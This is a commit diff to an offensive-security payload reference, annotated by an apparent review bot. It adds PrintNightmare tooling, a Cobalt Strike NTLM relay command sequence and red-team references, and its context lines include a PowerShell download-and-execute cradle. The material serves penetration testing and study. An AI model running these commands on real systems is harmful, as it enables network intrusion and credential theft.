mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-20 10:18:50 +00:00

CS NTLM Relay

parent 6cba7ceda9
commit fde99044c5
@ -601,19 +601,20 @@ Requirements:
**Detect the vulnerability**:
* Impacket - [rpcdump](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py)
```ps1
python3 ./rpcdump.py @10.0.2.10 | grep MS-RPRN
python3 ./rpcdump.py @10.0.2.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
```
* [It Was All A Dream](https://github.com/byt3bl33d3r/ItWasAllADream)
```ps1
git clone https://github.com/byt3bl33d3r/ItWasAllADream
cd ItWasAllADream && poetry install && poetry shell
itwasalladream -u user -p password -d domain 192.168.1.0/24
itwasalladream -u user -p Password123 -d domain 10.10.10.10/24
docker run -it itwasalladream -u username -p Password123 -d domain 10.10.10.10
```

**Trigger the exploit**:

**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/`
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109): `python3 ./smbserver.py share /tmp/smb/` or using [Invoke-BuildAnonymousSMBServer](https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer/blob/main/Invoke-BuildAnonymousSMBServer.ps1) : `Import-Module .\Invoke-BuildAnonymousSMBServer.ps1; Invoke-BuildAnonymousSMBServer -Path C:\Share -Mode Enable`

* [SharpNightmare](https://github.com/cube0x0/CVE-2021-1675)
```powershell
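Review bot: the new `**NOTE**:` line has a stray space before the colon in `[Invoke-BuildAnonymousSMBServer](...) :`, unlike the `PR #1109):` form earlier in the same sentence; drop it. Since the line now offers two hosting options, it would also read better as two bullets (Impacket `smbserver.py` on Linux, `Invoke-BuildAnonymousSMBServer` on Windows) so each command sits on its own line. Unrelated but visible here: the `rpcdump.py` and `itwasalladream` blocks are Linux commands fenced as `ps1`; `bash` would be the accurate tag.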
@ -2873,4 +2874,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/)
* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/)
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/)
* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/)
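Review bot: the added `NTLM relaying to AD CS` entry is the only one in this list without a date; the neighbouring entries carry `Author - Date`, so add the post's date for consistency. Also check the `Certified Pre-Owned` line: it is shown twice, while the hunk header (`-2873,4 +2874,5`) accounts for exactly one added line, so it should be a display duplicate rather than a second copy in the file.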
@ -1037,7 +1037,7 @@ Use the script **azuread_decrypt_msol.ps1** from @xpn to recover the decrypted p

Now you can use the retrieved credentials for the MSOL Account to launch a DCSync attack.

## Azure AD Connect - Seamless Single Sign On Silver Ticket
### Azure AD Connect - Seamless Single Sign On Silver Ticket

> Anyone who can edit properties of the AZUREADSSOACCS$ account can impersonate any user in Azure AD using Kerberos (if no MFA)

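Review bot: demoting `## Azure AD Connect - Seamless Single Sign On Silver Ticket` to `###` makes the Silver Ticket material a subsection of the preceding MSOL/DCSync section. If that is the intended hierarchy, the other Azure AD Connect sections should be demoted the same way, and any table-of-contents or anchor link that pointed at the old `##` heading should be re-checked, since the visible context does not show one being updated.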
@ -37,6 +37,7 @@ $ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstri
* [Resource Kit](#resource-kit)
* [Artifact Kit](#artifact-kit)
* [Mimikatz Kit](#mimikatz-kit)
* [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
* [References](#references)


@ -169,6 +170,7 @@ $ %windir%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe \\10.10.10.10\Shared\d
* Cobalt Strike - Malleable C2 Profiles https://github.com/xx0hcd/Malleable-C2-Profiles
* Cobalt Strike Malleable C2 Design and Reference Guide https://github.com/threatexpress/malleable-c2
* Malleable-C2-Profiles https://github.com/rsmudge/Malleable-C2-Profiles
* SourcePoint is a C2 profile generator https://github.com/Tylous/SourcePoint

```powershell
set useragent "SOME AGENT"; # GOOD
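Review bot: the added SourcePoint bullet matches its neighbours (bare URL, no markdown link), which is fine, but all four entries differ in style from the `[title](url)` form used in `## References` further down; worth unifying while touching the list. The `set useragent "SOME AGENT"; # GOOD` snippet below is Malleable C2 profile syntax, not PowerShell, so the `powershell` fence tag is misleading.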
@ -472,6 +474,16 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
* Load the mimikatz.cna aggressor script
* Use mimikatz functions as normal

## NTLM Relaying via Cobalt Strike

```powershell
beacon> socks 1080
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
beacon> rportfwd_local 8445 <IP_KALI> 445
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445
```

## References

* [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
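Review bot: the new `## NTLM Relaying via Cobalt Strike` section is a bare command list with no explanation of what each step does, unlike the sections around it. At minimum state the prerequisites the commands imply: the beacon must be elevated, because `upload ... WinDivert64.sys` followed by `PortBender redirect 445 8445` loads a kernel driver that redirects inbound SMB on the compromised host to the `rportfwd_local 8445 <IP_KALI> 445` listener, and `PortBender` only exists as a beacon command once its aggressor script (`PortBender.cna`) has been loaded, which the block does not show. Spelling this out also tells blue-team readers where the noisy step is (the driver load). The source post is added to `## References` in the next hunk; link it from this section. Minor: the block mixes `beacon>` and `kali>` prompts, so `powershell` is not the right fence tag.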
@ -487,4 +499,5 @@ Artifact Kit (Cobalt Strike 4.0) - https://www.youtube.com/watch?v=6mC21kviwG4 :
* [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/)
* [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
* [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
* [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
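Review bot: the added reference uses `Title - Date - Author` order, whereas the entries above it use `Title - Author - Date` (e.g. `... - Neil Lines - 15 Apr 2019`); reorder to `NTLM Relaying via Cobalt Strike - Rasta Mouse - July 29, 2021`. The `How to Write Malleable C2 Profiles` entry also appears twice here although the header (`-487,4 +499,5`) adds just one line; confirm the file does not end up with two copies.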